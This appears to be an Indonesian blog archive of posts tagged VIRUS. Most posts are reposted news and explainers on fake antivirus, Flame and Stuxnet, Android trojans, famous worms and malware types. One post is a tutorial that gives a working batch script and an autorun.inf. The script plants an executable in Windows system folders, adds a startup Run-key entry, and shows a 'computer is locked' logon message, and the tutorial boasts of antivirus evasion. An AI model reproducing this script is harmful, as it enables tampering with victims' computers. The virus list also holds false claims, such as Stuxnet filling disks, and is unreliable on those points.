Tampilkan postingan dengan label VIRUS. Tampilkan semua postingan
Tampilkan postingan dengan label VIRUS. Tampilkan semua postingan

Tips untuk mendeteksi antivirus palsu

Tips untuk mendeteksi antivirus palsu
Tips untuk mendeteksi antivirus palsu~Berbagai cara dilakukan oleh pencipta malware untuk menyerang perangkat elektronik seperti handset atau PC. Mulai dari cara langsung, berkedok email sampai dengan berbalut sebuah software antivirus. Untuk ada beberapa tips untuk mengidentifikasi malware yang berkedok antivirus tersebut.

Menurut seorang peneliti senior dari Fortinet FortiGuard Labs di Sunnyvale, California bernama Raul Alvarez, "Saat ini muncul berbagai macam antivirus palsu yang tersebar dan menawarkan diri untuk diunduh secara gratis. Rata-rata antivirus palsu tersebut menggunakan variasi, style dan nama yang berbeda-beda. Namun, terdapat hal lain yang dapat membedakan antivirus palsu tersebut dengan yang asli."

Antivirus palsu tersebut rata-rata akan menawarkan jasa scanning otomatis ke perangkat penggunanya dan di akhir tugasnya, software tersebut akan memberitahukan bahwa perangkat penggunanya telah terinfeksi oleh virus atau malware.

Kedua, antivirus palsu selalu 'meminta bayaran' apabila penggunanya ingin melakukan scanning secara menyeluruh. Namun, disarankan untuk tidak secara langsung memasukkan informasi seputar kartu kredit yang dipunyai karena info tersebut akan secara langsung dicopy dan digunakan oleh cybercriminal untuk tujuan lain.

Alvarez dan timnya juga telah meneliti bahwa mayoritas antivirus palsu tersebut memiliki satu sistem yang bernama W32/FakeAV.RA!tr. "Ketika malware tersebut menginjeksi suatu perangkat maka secara otomatis akan muncul suatu peringatan bahwa alat elektronik yang digunakan penggunanya telah terinfeksi spyware," lanjutnya.

Ketika notifikasi terdapatnya spyware tersebut muncul dan diklik oleh penggunanya, maka malware berkedok antivirus tersebut akan memulai aksinya yang seakan-akan sedang melakukan scanning terhadap seluruh isi di dalam komputer. Setelah proses scanning berakhir, muncul satu notifikasi lain yang menyuruh penggunanya untuk memasukkan informasi kartu kredit.

Alvarez menyarankan agar pengguna PC atau handset yang telah terinfeksi perangkatnya oleh malware antivirus palsu untuk menggunakan software yang asli dan melakukan scanning secara menyeluruh. Setelah itu diharapkan untuk melakukan reboot dan masuk ke dalam safe mode dan memulai scanning sekali lagi. 




Source:merdeka.com

Virus Komputer Jahili Printer Kantor

detail berita

CALIFORNIARibuan unit printer kantor memuntahkan halaman-halaman kosong karena virus komputer.

Laporan dari perusahaan keamanan mengungkapkan, ribuan halaman kertas terbuang ketika Windows PC pengguna terkena virus. Negara paling parah menerima serangan virus ini ialah perusahaan besar yang berada di Amerika Serikta (AS), India, Eropa, dan Amerika Selatan.

Dilansir BBCNews, dalang dari serangan ini ialah program jahat yang disebut Milicensi, yang digunakan oleh para kelompok kejahatan.

Perusahaan keamanan Symantec melalui blopost menganalisis virus ini dan mengatakan Milicenso pertama kali terlihat pada 2010 dan sejak itu program jahat ini muncul secara teratur sampai saat ini.

Inkarnasi terbaru ialah sebagai alat untuk mendistribusikan adware berbahasa Prancis. Symantec mengatakan, Milicenso dapat menginfeksi PC dengan berbagai jalur, seperti lampiran email, melalui website atau menyamar sebagai decoder video palsu.

Symantec mengatakan dampak dari infeksi ialah menghasilkan file dalam antrian printer PC. File dalam ini masuk ke dalam direktori utama virus dan mengganggu pekerjaan cetak.

"Cetakan dari printer menjadi kacau merupakan efek samping dari infeksi virus ini yang disengaja dibuat oleh penulisnya," kata Symantec.



Sumber:okezone.com

Amerika Serikat dan Israel Ciptakan Virus Komputer Flame?

detail berita
Ilustrasi

TEHERAN – Menurut laporan, Amerika Serikat (AS) dan Israel ada di balik virus komputer Flame yang ditemukan beberapa waktu lalu, di tengah serangkaian serangan terhadap industri minyak Iran. Laporan itu menyebutkan, virus tersebut sengaja diciptakan sebagai bagian dari kampanye mengintensifkan perang cyber.

Pekan lalu ditemukan kesamaan antara koding dari Flame, sebuah bagian dari malware yang menyamar sebagai update perangkat lunak Microsoft, dan Stuxnet yaitu virus yang sebelumnya diluncurkan di infrastruktur nuklir Iran.

“Ini semua adalah bagaimana mempersiapkan medan perang untuk jenis lain dari aksi rahasia,” kata salah satu mantan pejabat tinggi resmi Amerika Serikat pada Washington Post.

Dilansir dari Telegraph,menurut perusahaan keamanan Rusia Kaspersky Lab, Awal bulan ini dilaporkan bahwa pihak yang bertanggung jawab untuk serangan cyber Flame dan Stuxnet, setidaknya telah bekerjasama paling sedikit satu kali. “Apa yang kami temukan adalah bukti yang sangat kuat bahwa Stuxnet/Duqu dan senjata cyber Flame memiliki hubungan,” kata Chief Security Expert Kaspersky Lab Alexander Gostev.

Hubungan baru yang ditemukan adalah modul khusus yang dikenal sebagai ‘Resources 207’, yang ditemukan dalam versi awal Stuxnet yang diciptakan pada 2009. ‘Resource 207’ memiliki banyak kesamaan dengan kode yang digunakan dalam virus Flame.

Selain itu, fungsi utama dari ‘Resource 207’ untuk mendistribusikan infeksi Stuxnet dari mesin ke mesin lainnya melalui USB. Kode yang bertanggungjawab untuk mendistribusikan malware juga menggunakan drive USB yang identik dengan yang ada pada Flame.

Meski fakta-fakta baru telah ditemukan, tapi Gostev tetap yakin bahwa Flame dan Stuxnet berasal dari platform berbeda, yang digunakan untuk mengembangkan beberapa senjata cyber. “Masing-masing memiliki arsitektur yang berbeda dengan trik unik mereka sendiri, yang digunakan untuk menginfeksi sistem dan melaksanan tugas-tugas utama.  Projek-projek ini memang terpisah dan independen,” jelas Gostev.

Baru-baru ini investigasi New York Times memberi kesan bahwa Presiden AS Barack Obama telah bekerjasama dengan Israel, secara konsisten memerintahkan serangan cyber yang canggih pada sistem komputer yang menjalankan fasilitas utama pengayaan nuklir Iran. Tapi program ini diketahui publik pada musim panas 2010 karena adanya kesalahan pemprograman dan dengan cepat dikenal sebagai Stuxnet.

Penemuan Kaspersky Lab yaitu adanya hubungan antara Stuxnet dan Flame, telah membuka jalan sekali lagi tuduhan bahwa AS dan Israel berada di balik serangan cyber terhadap Iran.

Meski begitu Kepala Telekomunikasi PBB Dr Hamadoun Toure memberi label bahwa investigasi New York Times sebagai “spekulasi”, sekaligus menyangkal bahwa AS bertanggung jawab atas serangan Flame.




Sumber:okezone.com

5 Ribu Malware Baru Serang Android


Pengaruh konsumerisasi IT yang terus melanda dunia membuat solusi keamanan tetap menjadi isu penting di tengah terlebih beberapa waktu lalu Trend Micro menemukan beberapa potensi ancaman.

Catatan lab Trend Micro, muncul 5 ribu malware baru dalam perangkat berbasis Android. Sebanyak 17 malware aplikasi di GooglePlay telah diunduh 700 ribu kali. Ada pula 100 ribu spyware telah diunduh.

Untuk menghadirkan solusi ini, Trend Micro memperkenalkan Mobile Security 7 Office Scan dan Titanium for Android.

"Ini merupakan solusi yang menjaga kebebasan individu, tapi data tetap aman," ujar Aulia Fajar Huriadi, Business Manager Trend Micro Indonesia, dalam media brefing di Kantor Trend Micro Incorporated, Jakarta, Selasa.
Piranti lunak Office Scan bisa digunakan untuk mengamankan jaringan yang dipakai berbagi file antara perangkat milik perusahaan dengan karyawannya.
Piranti lunak Titanium hadir dengan konsep keamanan dalam satu piranti. Beberapa fiturnya yakni antivirus, antispyware, perlindungan dari ancaman web, pencegahan pencurian data, dan enkripsi data. Fitur find us dapat digunakan untuk mencari perangkat yang hilang melalui mediasi GPS.

Solusi Mobile Security 7 Office Scan dikhususkan untuk kalangan entreprise sedangkan Titanium dikhususkan untul kalangan entreprise.

Fokus Konsumer

Trendmicro kini akan lebih memfokuskan bisnis software keamanannya di segmen konsumen.

Trendmicro sendiri sudah mulai berdiri sejak tahun 1988 yang memfokuskan pada bisnis layanan keamanan sistem komputerisasi, sistem keamanan yang dibuatnya menyasar 3 pasar seperti segmen Enterprise, SMB (small bussines), dan Consumer.

"Kemajuan bisnis kami di segmen Enterprise sendiri sudah mencapai 80 persen, sementara di Consumer 20 persen," ujar Aulia.

"Kami akan mefokuskan bisnis layanan keamanan ini di segmen Consumer hingga 5 tahun ke depan," tambah David Rohan selaku  Country Manager and Regional Director Trendmicro Asia

 vivanews.com

Virus Komputer Paling Ganas 2011-2012



Virus Komputer Paling Ganas 2011-2012~Beragam jenis virus berkeliaran di sepanjang 2011-2012. Mulai dari Stuxnet, Rammit, Webmoner, dan beberapa jenis virus lain yang cukup sulit dibasmi.
Berikut Virus Komputer Paling Ganas di 2011-2012:
 
1. Stuxnet, merupakan salah satu virus yang cukup heboh karena efek yang cukup nyata. Dengan membuat space hardisk korban menjadi habis sehingga memunculkan peringatan “Low Disk Space”. Hal ini karena Stuxnet membuat file sampah berukuran besar yang terus membengkak.

2. Ramnit, merupakan salah satu virus yang telah sukses menggantikan peran Sality di awal tahun 2011 dalam menginfeksi komputer dan file executable. Sejak Januari hingga saat ini, sudah banyak komputer yang telah terinfeksi virus ini.

Selain Ramnit virus lain yang menyebar di awal tahun 2011 yaitu Webmoner dan FontAgent.

3. Webmoner, virus ini memiliki kemiripan dengan Ramnit yaitu membuat 4 file shortcut, tetapi file virus pemicunya justru memiliki extension sys yaitu file mso.sys.

4. Sedangkan FontAgent juga memiliki file shortcut, hanya saja file virus pemicunya justru memiliki extension fon (Font file) seperti setup50045.fon atau setup50039.fon.

Demam Facebook juga ikut merambah metode penyerangan virus di tahun 2011 ini. Dengan memanfaatkan fungsi status dan Facebook Chat, banyak hal yang terjadi seperti pishing (artikel Pishing FB Chat), celah XSS (artikel XSS), scam (artikel Scam) hingga penyebaran malware.

5. Kolab, merupakan virus Facebook Chat yang cukup heboh karena memiliki kemampuan metamorphic. Setiap malware yang disebarkan melalui FB Chat, walaupun memiliki ukuran dan nama yang sama, tetapi justru memiliki algoritma hash yang berbeda.

Selain itu, Kolab memanfaatkan teknik FakeURL (link palsu) seolah-olah pengguna komputer mendownload file gambar (JPG), padahal yang diunduh adalah virus.

6. FakeAV, salah satu virus yang cukup terkenal sejak 2 tahun lalu juga tidak mau kalah di tahun ini. Tercatat 2 artikel telah dipublish oleh Vaksincom terhadap serangan varian malware ini.

FakeAV merupakan virus yang menggunakan metode aplikasi keamanan palsu (antivirus palsu) untuk mengelabui pengguna komputer dengan notifikasi dan pesan-pesan bahwa komputer telah terinfeksi virus dan meminta pengguna komputer untuk mengaktifkan antivirus palsu tersebut dengan cara melakukan pembayaran online.

7. Slugin, salah satu varian virus yang menyebarkan spam juga ikut meramaikan persaingan di tahun 2011. Jika di tahun-tahun sebelumnya ada Virut, maka tahun ini Slugin menjadi biang dari penyebaran spam yang tidak jelas.

Dengan memanfaatkan akun email pengguna komputer yang terinfeksi, maka Slugin mengirimkan spam kepada kontak-kontak yang dimiliki oleh pengguna komputer tersebut.

8. BitCoinMiner/DorkBot, inilah trojan Zbot pencari uang yang cukup handal. Dengan adanya mata uang digital, dan adanya pula program bisnis penghasil uang dengan cara menambang (bitcoin mining), pembuat virus menjadikan hal ini sebagai salah satu cara yang cukup praktis.

Dengan melakukan BitCoin Mining pada ribuan komputer terinfeksi, maka akan dengan mudah menghasilkan uang yang cukup banyak. BitCoinMiner sendiri memiliki 2 varian virus yang pertama menggunakan icon abjad pada file virus sebagai penyebaran.

Sedangkan varian kedua menggunakan metode dari Kolab dengan menyebarkan file virus melalui Facebook Chat. File tersebut pun berbeda, karena menggunakan icon wanita sexy untuk menarik perhatian.

9. MacSecurity,
varian virus ini cukup heboh di pertengahan tahun 2011 karena memiliki 5 varian yang berbeda tetapi sama yaitu MacDefender, MacGuard, MacProtector, MacShield dan MacSecurity.

Memiliki karakter yang sama seperti FakeAV yang berjalan di Windows, MacSecurity mengelabui pengguna komputer dengan notifikasi dan pesan-pesan bahwa komputer telah terinfeksi virus dan meminta pengguna komputer untuk mengaktifkan antivirus palsu tersebut dengan cara melakukan pembayaran online.

10. Virus Android, bak menggantikan peran dari Windows Mobile, Android di tahun ini cukup meroket dan bahkan hampir setiap hari banyak aplikasi yang dibuat khusus untuk sistem operasi tersebut.

Tetapi justru hal tersebut menjadi buah simalakama karena di antara jutaan aplikasi itu merupakan virus jejadian. Di awali dari trojan Android.

Plankton yang menyerang menggunakan nama aplikasi game Angry Birds, hingga Android.Gongfu, Android.Wukong, Android.SmsSend dan Android.DreamExploid yang banyak menyerang aplikasi-aplikasi, terutama game.

[Referensi dari DetikInet.com].

Awas, Trojan Menyamar Jadi Game China

 
detail berita
ilustrasi (foto : Google)
Android masih sering jadi incaran aplikasi palsu. Kali ini virus Trojan menyamar sebagai aplikasi game China bernama The Roar of the Pharaoh.

Dalam blog milik Chester Wisniewski, peneliti keamanan Sophos, aplikasi itu disebut sebagai aplikasi jahat yang mengumpulkan informasi sensitif tentang perangkat Android tempatnya mendarat.

Informasi yang dikumpulkan adalah hal pribadi dan detil teknis, termasuk nomor ponsel. Setelah terkumpul, informasi itu akan dikirimkan pada pembuat malware. Demikian diwartakan PC World, Senin (2/4/2012).

"Seperti banyak Trojan mobile lain, virus yang satu ini mengirim pesan teks ke nomor tujuan sms bertarif premium. Selain itu juga mampu membaca sms di dalam ponsel Anda," terang Wisniewski.

Sophos telah mengidentifikasi Trojan Android ini sebagai Andr/Stiniter-A. Dikatakan bahwa virus ini tidak meminta izin khusus pada saat instalasi. The Roar of the Pharaoh sendiri merupakan game China yang legal, meskipun aplikasi Androidnya diyakini tidak tersedia dalam Google Play.

Michael Sutton, Vice President lembaga peneliti keamanan Zscaler mengatakan bahwa game The Roar of the Pharaoh untuk Android mencerminkan pergeseran target para pembuat malware. Game palsu yang sebenarnya adalah Trojan semakin meningkat dan menjadi tipe penipuan di Android saat ini.




Sumber:Okezone.com

Cara Buat Virus Sederhana Dari Notepad

ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )
ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…
note: “HANYA BEKERJA PADA WINDOWS XP”
caranya:

- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efekny

10 Virus PC yang Berbahaya

10. CIH – Kerugian $ 80.000.000

Virus ini dianggap salah satu virus yang paling berbahaya dan paling merusak yang pernah ada karena memiliki kemampuan untuk tetap tidak terdeteksi dalam memori komputer, dan menginfeksi setiap aplikasi yang dijalankan. Pertama kali dirilis pada tahun 1998, virus CIH file executable menginfeksi mulai dari sistem operasi Windows 95, 98, sampai windows ME.
Virus ini juga sengaja didistribusikan oleh vendor perangkat lunak, yang memberikan kontribusi  besar untuk menginfeksi komputer. Apa yang membuat virus ini berbahaya adalah bahwa ia memiliki tanggal pemicu. Setelah tanggal itu tercapai, hal itu menimpa file pada hard drive dan menghancurkan semua isi file.
CIH juga memiliki kemampuan untuk menimpa BIOS dari komputer untuk mencegah boot up. Virus ini juga dikenal sebagai virus Chernobyl karena beberapa varian yang ditetapkan untuk menghancurkan data di komputer yang bertepatan dengan kecelakaan pembangkit tenaga nuklir.
9. Blaster – Kerugian $ 320.000.000
Virus Blaster adalah sebuah malware kompleks yang menyebar sendiri tanpa melalui email, tetapi melalui kerentanan pengamanan baik di sistem Windows 2000 dan Windows XP. Ini perangkat lunak berbahaya yang terdeteksi pada pertengahan-2003 dan pada saat itu telah menginfeksi ratusan ribu komputer.

Blaster worm
Setelah komputer terinfeksi, virus ini menampilkan sebuah kotak pesan yang menunjukkan bahwa sistem akan menutup dalam beberapa menit. Ia juga diprogram untuk meluncurkan serangan DDoS ke server yang dijalankan oleh Microsoft pada April 2003. Didalam kode virus ini juga ditemukan pesan tersembunyi untuk pendiri Microsoft Bill Gates yang berbunyi “Billy Gates, mengapa Anda membuat ini terjadi? Berhentilah membuat uang, dan memperbaiki perangkat lunak Anda!
8. Sasser – Kerugian $ 500.000.000
Sasser adalah virus komputer yang cukup rumit yang mampu melumpuhkan ribuan komputer. Virus ini dibuat oleh seorang mahasiswa berumur 17 tahun di Jerman pada tahun 2004. Sasser tidak menyebar melalui email, dan tidak memerlukan campur tangan manusia untuk menginfeksi sebuah komputer. Virus ini menginfeksi komputer dengan memanfaatkan kerentanan yang hadir di kedua mesin Windows 2000 dan Windows XP, yang dikenal sebagai mengeksploitasi (Remote Procedure Call) RPC – kerentanan yang sama yang digunakan oleh virus Blaster.
Sasser timeline
Sasser berhasil menginfeksi dan mematikan ribuan jaringan komputer hanya dalam hitungan hari. Setelah menginfeksi komputer, virus ini diprogram untuk mengakses internet untuk mencari mesin rentan lainnya sehingga dapat menginfeksi komputer lainnya.
7. SQL Slammer – Kerugian $ 750.000.000
Sql after
SQL Slammer adalah virus peringkat 7 yang paling merusak dalam daftar ini. Muncul pada Januari 2003, menyebar cepat lewat internet. Waktu itu virus ini sempat membuat layanan ATM Bank Amerika crash, hancurnya layanan 911 Seattle, dan Continental Airlines membatalkan beberapa penerbangan karena error check in dan ticketing.
6. Virus Melissa – Kerugian $ 1.200.000.000

Dibikin tahun 1999 oleh David L Smith, basicnya Microsoft Word macro. Menyebar via email dengan dokumen “Here is that document you asked for, don’t show it to anybodey else.” Virus ini juga telah menginfeksi sampai 20% pemilik komputer di seluruh dunia. Bila sampai dibuka, virus akan mereplikasi dan otomatis terkirim ke top 50 di address book email Anda. Smith dipenjara 20 bulan karena ulahnya dan didenda $5000 serta dilarang mengakses komputer tanpa pengawasan.
5. Code Red – Kerugian $ 2.000.000.000
Code Red
Tidak seperti virus lain, ini adalah virus yang ditargetkan agar komputer menjalankan Microsoft IIS (Internet Information Server) Web Server, dan mengeksploitasi bug dalam perangkat lunak. Setelah komputer telah terinfeksi, virus ini akan memodifikasi situs yang diakses dan menampilkan pesan “Welcome to http://www.worm.com! Hacked oleh Cina “Lalu!, Nanti virus ini akan mencari komputer lain untuk menjalankan software web server dan melakukan hal yang sama. Setelah sekitar dua minggu menginfeksi, virus ini diprogram untuk memulai DDoS (Distributed Denial of Service) serangan pada situs-situs tertentu, termasuk server Gedung Putih.
4. Conficker: Kerugian $ 9.100.000.000
Conficker
Conficker (juga disebut Downup, Downandup dan Kido) adalah worm yang muncul pada Oktober 2008. Conficker menyerang Windows dan paling banyak ditemui dalam Windows XP. Microsoft merilis patch untuk menghentikan worm ini pada tanggal 15 Oktober 2008. Heinz Heise memperkirakan Conficker telah menginfeksi 2.5 juta PC pada 15 Januari 2009, sementara The Guardian memperkirakan 3.5 juta PC terinfeksi.Pada 16 Januari 2009, worm ini telah menginfeksi hampir 9 juta PC, dan menjadikannya salah satu infeksi virus yang paling cepat menyebar dalam waktu singkat.
3. ILOVEYOU – Kerugian $ 15.000.000.000
Worm ini berasal dari Manila, Filipina pada tanggal 4 Mei 2000 dan menyebar ke seluruh dunia dalam satu hari, pindah ke Hong Kong, kemudian ke Eropa dan Amerika Serikat, menyebabkan kerugian ekonomi sekitar $ 5,5 miliar dalam jangka waktu kurang dari 2 minggu. Pada tahun 2000, 50 juta orang telah melapor terinfeksi virus ini. Dalam rangka untuk membebaskan diri dari virus ini, Pentagon, CIA, dan Parlemen Inggris harus menutup sistem email mereka;. Seperti yang dilakukan kebanyakan perusahaan besar dunia.
iloveyou
Worm ini menimpa file penting – file musik, file multimedia, dan banyak lagi – dengan salinan dirinya. Virus ini juga mengirim worm ke lima puluh orang pertama dalam daftar buku teman. Karena ditulis dalam Visual Basic Script dan dihubungkan dengan Buku Alamat Windows Outlook, worm ini hanya mempengaruhi komputer yang menjalankan sistem operasi Microsoft Windows.
2. Sobig.F – Kerugian $ 37.000.000.000
Sobig.F
Virus komputer ini menyebabkan kerugian miliaran dolar dengan mengulur-ulur atau benar-benar menabrak gateway Internet dan server email, sehingga tanpa ampun memperlambat akses internet global. Virus Ini dapat mengirim lebih dari satu juta salinan dari dirinya sendiri hanya dalam beberapa jam. Pada September 2003, virus ini telah diprogram untuk menonaktifkan dirinya sendiri. Dan akhirnya virus ini berhenti mengancam dunia dengan sendirinya.
1. MyDoom – Kerugian $ 38.000.000.000
Mydoom
Mulai menyerang tanggal 1 Februari 2004, virus ini membuat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS. Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara-gara MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center.

Referensi: wildammo/wikipedia

Virus dan Ulahnya

Kebanyakan  virus    melakukan  penyerangan  (pengerusakan)  terhadap  file-file  komputer  korbannya. 
Serangan  virus  ini  yang  sangat  ditakuti  oleh  pengguna  computer.  Tetapi  jika  virus  tersebut  hanya
melakukan  penyebaran  itu  bukan  masalah  karena  tidak  melakukan  pengerusakan  jadi  si  korban  tidak
merasa begitu dirugikan. Lalu bentuk-bentuk serangan apa saja yang dilakukan virus pada file?
Bentuk-bentuk serangan yang dilakukan virus pada file:

1.  Menghapus,  memindahkan,  menyembunyikan  dan  mengerusak  file(harap  jangan  sampai
merusak isi file karena sapa tahu file itu sangat penting mungkin file tersebut tulisan skripsi ato
apalah yang tentunya begitu berarti bagi user(patuhi  saran  vm yang baik ?)
2.  Infeksi  terhadap  file,  biasanya  virus  melakukan  ini  untuk  melindungi  dirinya  dengan  cara
menempel dirinya pada file yang ingin di infeksi. Biasanya file*.exe, *.com,  dll.
3.  Memformat  partisi  dan  menghapus  partisi  (harap  bagi  vm  jangan  lakukan  ini  karena  selain
memusnahkan virus sendiri juga memusnahkankan data orang).
4.  Menyembunyikan  folder  asli  lalu  membuat  folder  palsu  dengan  nama  yang  sama  tetapi  folder
tersebut  sebenarnya  adalah  file  virus  berekstensi  .exe  hal  ini  juga  dapat  dilakukan  pada  file
dengan ekstensi2 tertentu  yang diinginkan sang vm untuk dibuat file palsunya.
Bentuk-bentuk  serangan  diatas  adalah  bentuk  serangan  yang  paling  sering  dilakukan  oleh  virus  untuk
melakukan  manipulasi  terhadap  suatu  file  .  Menghapus,  memindahkan  dan  menyembunyikan  file
merupakan  hal  yang  sangat  sering  digunakan  oleh  virus.  Bahkan  hampir  semua  virus  menggunakan
tehnik  ini  untuk  melakukan  manipulasi  terhadap  suatu  file.   Infeksi  terhadap  file  exe,  com,  dan  scr
sangat jarang ditemukan karena teKnik ini cukup sulit dilakukan

Macam-Macam VIRUS KOMPUTER

 Virus memiliki teman – teman yang juga berbahaya. Namun berbeda cara menyerangnya. Virus
dan  teman  –  temannya  tersebut  tergolong  dalam  kategori  malware  atau  kepanjangannya
Malicious  Software.  Malware  adalah  suatu  program atau  aplikasi  yang  dibuat  untuk  tujuan
mengubah, merusak, dan mencuri data orang lain.    Berikut ini adalah jenis – jenis malware
yang dapat mengganggu sistem komputer selain virus :



1.Worm  
Worm atau dalam bahasa Indonesia disebut dengan cacing. Seperti sifat cacing, worm dapat
menyebar ke beberapa komputer melalui port tertentu. Worm juga memiliki sifat seperti virus
yaitu menggandakan diri. Biasanya worm dibuat untuk merusak sistem komputer tertentu yang
sudah menjadi target dari jarak jauh ( remote).

2Trojan  
Awalnya  Trojan  merupakan  istilah  dalam  perang.  Dimana  trojan  adalah  sebuah  alat  untuk
dimasukkan  dengan  cara  mengelabui  ke  area  musuh.  Setelah  masuk,  maka  alat  tersebut
berubah untuk menghancurkan musuh tersebut dari dalam.
Programmer  terinspirasi  untuk  membuat  program  yang  bersifat  menghancurkan  dan  dapat
mengelabuhi targetnya. Seperti halnya dengan virus,Trojan juga memiliki kemampuan untuk
menggandakan diri seperti virus. Selain itu trojan juga dapat mengendalikan program tertentu
dan dapat mengelabuhi sistem dengan menyerupai aplikasi biasa.    
Jika  komputer  terinfeksi  Trojan  dan  telah  dikendalikan  oleh  penyerangnya,  ada  beberapa
kemungkinan yang dapat terjadi. Berikut ini merupakan contoh kejadian jika komputer telah
terserang oleh Trojan dengan nama NetBus :
?* Menghapus File.  
?  Mengirim dan mengambil File.
?  Menjalankan program – program aplikasi.
?  Menampilkan gambar.
?  Mengintip program-program yang sedang dijalankan.
?  Menutup program-program yang sedang dijalankan.
?  Membuka dan menutup CD-ROM drive.
?  Mengirim pesan dan mengajak untuk bicara (chat).
?  Mematikan komputer.

3.Backdoor
Backdoor merupakan jenis  malware yang menyerang sistem komputer dengan memberikan
hak  akses  supaya  pengguna  lain  dapat  menjalankan  komputer  yang  menjadi  target.
Berdasarkan cara bekerja dan perilaku penyebarannya, backdoor dapat dibagi menjadi 2 grup.
Grup  pertama  mirip  dengan  Trojan.  Mereka  secara  manual  dimasukkan  ke  dalam  suatu
program  pada  perangkat  lunak  dan  kemudian  ketika  perangkat  lunak  itu  diinstal,  mereka
menyebar. Backdoor dalam grup ini dijalankan sebagai bagian dari proses boot. Ratware adalah
sebutan untuk backdoor yang mengubah komputer menjadi zombi yang mengirimkan spam.
Backdoor  lain  mampu  mengacaukan  lalu  lintas  jaringan,  melakukan  brute  force  untuk
meng-crack  password  dan  enkripsi,  dan  mendisitribusikan  serangan  distributed  denial  of
service (DDoS).

4.Spyware
Malware jenis ini merupakan program yang dibuat untuk tujuan sebagai mata – mata. Hal ini
memiliki maksud bahwa program tersebut akan mengumpulkan dan mengirimkan informasi
tentang pengguna komputer tanpa diketahui oleh si pengguna itu. Informasinya bisa saja yang
tidak terlampau berbahaya seperti pola berkomputer, terutama berinternet, seseorang, sampai
yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking), dan
password suatu akun.

5.Hijacker  
Kata  Hijacker  dalam  bahasa  Indonesia  berarti  pembajak.  Malware  ini  dinamakan  demikian
karena memiliki sifat yang hampir sama dengan pembajak. Program ini akan membajak suatu
program  lain  di  sistem  komputer  misalnya  Internet  Explorer.  Internet  Explorer  akan
ditambahkan fungsi dan diarahkan untuk mengakses situs yang berbahaya.

6.Wabbit
Wabbit memiliki kesamaan sifat dengan worm yaitu tidak membutuhkan suatu program dan
dokumen untuk bersarang. Tetapi berbeda dengan worm yang menyebarkan diri ke komputer
lain menggunakan jaringan, wabbit menggandakan diri secara terus menerus di dalam sebuah
komputer lokal dan hasil penggandaan itu akan menggerogoti sistem.Kinerja komputer akan
melambat karena wabbit memakan sumber daya yang lumayan banyak. Selain memperlambat
kinerja  komputer  karena  penggunaan  sumber  daya  tersebut,  wabbit  bisa  diprogram  untuk
memiliki efek samping yang efeknya mirip dengan malware lain. Kombinasi-kombinasi malware
seperti inilah yang bisa sangat berbahaya. 
  
7.Keylogger  
Merupakan malware yang dibuat dengan tujuan untuk mencatat setiap tekanan tombol pada
keyboard. Catatan yang disimpan dalam suatu file yang bisa dilihat kemudian itu lengkap. Di
dalamnya  bisa  terdapat  informasi  seperti  aplikasi  tempat  penekanan  tombol  dilakukan  dan
waktu  penekanan.  Dengan  cara  ini,  seseorang  bisa  mengetahui  username,  password,  dan
berbagai  informasi  lain  yang  dimasukkan  dengan  cara  pengetikan.  Keylogger  ini  cukup
berbahaya karena secanggih apa pun enkripsi yang diterapkan oleh suatu website, password
itu tetap dapat diambil. Karena, password itu diambil sebelum sempat dienkripsi oleh sistem.
Keylogger merekam sesaat setelah password diketikkan dan belum diproses oleh sistem.

8.Dialer  
Merupakan malware yang dapat mengoneksikan komputer yang terhubung ke internet ke situs
tertentu  yang  merugikan  korban.  Malware  ini  akan  menyerang  para  pengguna  komputer
dengan menggunakan diul up telepon. Dialer juga dapat mengganti nomor penyedia layanan
Internet yang biasa dihubungi dengan nomor penyedia  layanan Internet lain yang biasanya
